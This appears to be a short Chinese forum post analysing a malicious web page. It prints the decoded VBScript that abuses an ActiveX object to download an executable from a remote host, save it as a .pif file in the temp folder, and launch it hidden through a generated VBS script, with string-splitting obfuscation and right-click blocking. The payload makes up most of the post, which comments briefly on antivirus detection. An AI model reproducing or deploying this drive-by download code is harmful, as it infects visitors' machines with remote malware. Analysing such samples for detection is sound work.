jdyxh.ahn.com.cn
解出
-
- <script language=VBScript>
- On Error Resume Next
- cuteqq = "http://tangyong.go.51.net/w.exe"
- Set cuteqq2 = document.createElement("object")
- cuteqqid="clsid:"
- cuteqqidx="BD96"
- cuteqqid2="C556-65"
- cuteqqid3="A3-11D"
- cuteqqid4="0-98"
- cuteqqid5="3A-00C"
- cuteqqid6="04FC"
- cuteqqid7="29E36"
- cuteqq3="Microsoft.X"
- cuteqq4="MLHTTp"
- cuteqq2.SetAttribute "classid", cuteqqid&cuteqqidx&cuteqqid2&cuteqqid3&cuteqqid4&cuteqqid5&cuteqqid6&cuteqqid7
- cuteqq5=cuteqq3&cuteqq4
- Set lovecuteqq = cuteqq2.CreateObject(cuteqq5,"")
- lovecuteqq.Open "GET", cuteqq, False
- lovecuteqq.Send
- Cuteqq_784378237="MicroSofts.pif"
- Cuteqq_784378237s="MicroSofts.vbs"
- Q784378237="Scripting."
- Q784378237s="FileSyst"
- Q784378237ss="emObject"
- Q784378237sss="Adod"
- Q784378237ssss="b.stream"
- Q784378237sssss=Q784378237sss&Q784378237ssss
- Set chilam = cuteqq2.createobject(Q784378237&Q784378237s&Q784378237ss,"")
- Set yingying = chilam.GetSpecialFolder(2)
- Cuteqq_784378237=chilam.BuildPath(yingying,Cuteqq_784378237)
- Cuteqq_784378237s=chilam.BuildPath(yingying,Cuteqq_784378237s)
- Set chilams = cuteqq2.createobject(Q784378237sssss,"")
- chilams.type=1
- chilams.Open
- chilams.Write lovecuteqq.ResponseBody
- chilams.Savetofile Cuteqq_784378237,2
- chilams.Close
- chilams.Type=2
- chilams.Open
- chilams.WriteText "Set Lovecuteqq = CreateObject(""Wscript.Shell"")"&vbCrLf&"Lovecuteqq.run ("""&Cuteqq_784378237&""")"
- chilams.Savetofile Cuteqq_784378237s,2
- chilams.Close
- cute="Shell.Applica"
- qq="tion"
- Set cute_qq = cuteqq2.createobject(cute&qq,"")
- Qq784378237="O"
- Qq784378237s="p"
- Qq784378237ss="e"
- Qq784378237sss="n"
- cute_qq.SHelLExeCuTe Cuteqq_784378237s,"","",Qq784378237&Qq784378237s&Qq784378237ss&Qq784378237sss,0
- </script>
- <script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
- <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
复制代码
hxxp://tangyong.go.51.net/w.exe
avira乱报 linkscanner索性没报...
|